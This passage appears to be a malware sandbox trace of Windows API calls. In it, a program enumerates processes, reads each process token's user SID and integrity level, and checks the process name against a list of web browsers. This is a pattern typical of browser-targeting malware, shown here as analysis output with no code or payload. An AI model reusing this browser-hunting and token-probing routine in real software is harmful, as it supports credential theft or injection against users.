GetLastError () returned 0x7a [0237.113] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.114] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.114] CloseHandle (hObject=0x340) returned 1 [0237.114] CloseHandle (hObject=0x548) returned 1 [0237.114] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.114] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.114] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.114] GetLastError () returned 0x7a [0237.114] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.114] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.114] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.114] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.114] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.114] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.114] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.114] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.114] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0237.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0237.114] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.115] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.115] GetLastError () returned 0x7a [0237.115] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.115] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.115] CloseHandle (hObject=0x340) returned 1 [0237.115] CloseHandle (hObject=0x548) returned 1 [0237.115] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.115] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.115] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.115] GetLastError () returned 0x7a [0237.115] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.115] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.115] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.115] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0237.115] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0237.115] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0237.115] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0237.116] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0237.116] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0237.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0237.116] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.116] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.116] GetLastError () returned 0x7a [0237.116] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.116] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.116] CloseHandle (hObject=0x340) returned 1 [0237.116] CloseHandle (hObject=0x548) returned 1 [0237.116] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.116] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.116] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.116] GetLastError () returned 0x7a [0237.116] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.116] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.116] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.117] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0237.117] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0237.117] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0237.117] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0237.117] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0237.117] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0237.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0237.117] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.117] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.117] GetLastError () returned 0x7a [0237.117] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.117] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.117] CloseHandle (hObject=0x340) returned 1 [0237.117] CloseHandle (hObject=0x548) returned 1 [0237.117] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.117] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.117] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.117] GetLastError () returned 0x7a [0237.118] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.118] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.118] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.118] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0237.118] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0237.118] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0237.118] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0237.118] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0237.118] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0237.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0237.118] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.118] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.118] GetLastError () returned 0x7a [0237.118] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.118] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.118] CloseHandle (hObject=0x340) returned 1 [0237.118] CloseHandle (hObject=0x548) returned 1 [0237.118] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.119] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.119] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.119] GetLastError () returned 0x7a [0237.119] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.119] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.119] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.119] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0237.119] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0237.119] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0237.119] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0237.119] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0237.119] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0237.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0237.119] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.119] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.119] GetLastError () returned 0x7a [0237.119] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.119] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.119] CloseHandle (hObject=0x340) returned 1 [0237.120] CloseHandle (hObject=0x548) returned 1 [0237.120] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.120] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.120] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.120] GetLastError () returned 0x7a [0237.120] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.120] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.120] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.120] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.120] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0237.120] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.120] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.120] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.120] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0237.120] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.120] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.120] GetLastError () returned 0x7a [0237.121] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.121] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.121] CloseHandle (hObject=0x340) returned 1 [0237.121] CloseHandle (hObject=0x548) returned 1 [0237.121] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.121] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.121] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.121] GetLastError () returned 0x7a [0237.121] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.121] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.121] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.121] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0237.121] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0237.121] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0237.121] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0237.121] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0237.121] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0237.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0237.122] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.122] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.122] GetLastError () returned 0x7a [0237.122] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.122] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.122] CloseHandle (hObject=0x340) returned 1 [0237.122] CloseHandle (hObject=0x548) returned 1 [0237.122] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.122] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.122] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.122] GetLastError () returned 0x7a [0237.122] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.122] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.122] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.122] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0237.122] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0237.123] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.123] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.123] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.123] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0237.123] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.123] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.123] GetLastError () returned 0x7a [0237.123] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.123] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.123] CloseHandle (hObject=0x340) returned 1 [0237.123] CloseHandle (hObject=0x548) returned 1 [0237.123] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.123] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.123] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.123] GetLastError () returned 0x7a [0237.123] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.123] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.124] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.124] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0237.124] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0237.124] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0237.124] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0237.124] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0237.124] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0237.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0237.124] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.124] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.124] 